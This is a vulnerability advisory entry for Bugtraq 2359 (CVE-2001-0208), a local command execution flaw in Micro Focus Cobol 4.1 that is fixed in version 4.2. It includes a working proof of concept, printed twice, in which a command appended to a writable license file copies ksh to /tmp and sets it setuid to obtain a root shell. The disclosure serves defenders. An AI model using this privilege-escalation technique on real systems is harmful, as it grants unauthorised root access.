Micro Focus Cobol Arbitrary Command Execution Vulnerability
BID:2359
Info
Micro Focus Cobol Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 2359 |
| Class: | Configuration Error |
| CVE: |
CVE-2001-0208 |
| Remote: | No |
| Local: | Yes |
| Published: | Feb 12 2001 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | First posted to Bugtraq by Dixie Flatline <[email protected]> on Feb 12, 2001. |
| Vulnerable: |
Micro Focus Cobol 4.1 |
| Not Vulnerable: |
Micro Focus Cobol 4.2 |
Exploit / POC
Micro Focus Cobol Arbitrary Command Execution Vulnerability
$ cat >> /var/mfaslmf/nolicense
/bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
^D
[wait until the application server licenses are used up]
$ /tmp/ksh
#
$ cat >> /var/mfaslmf/nolicense
/bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
^D
[wait until the application server licenses are used up]
$ /tmp/ksh
#
Solution / Fix
Micro Focus Cobol Arbitrary Command Execution Vulnerability
Solution:
The vendor has released a fix for this issue in version 4.2.
Micro Focus Cobol 4.1
Solution:
The vendor has released a fix for this issue in version 4.2.
Micro Focus Cobol 4.1
-
Micro Focus Cobol 4.2
http://supportline.microfocus.com/
References
Micro Focus Cobol Arbitrary Command Execution Vulnerability
References:
References:
- Micro Focus Product Homepage (Merant)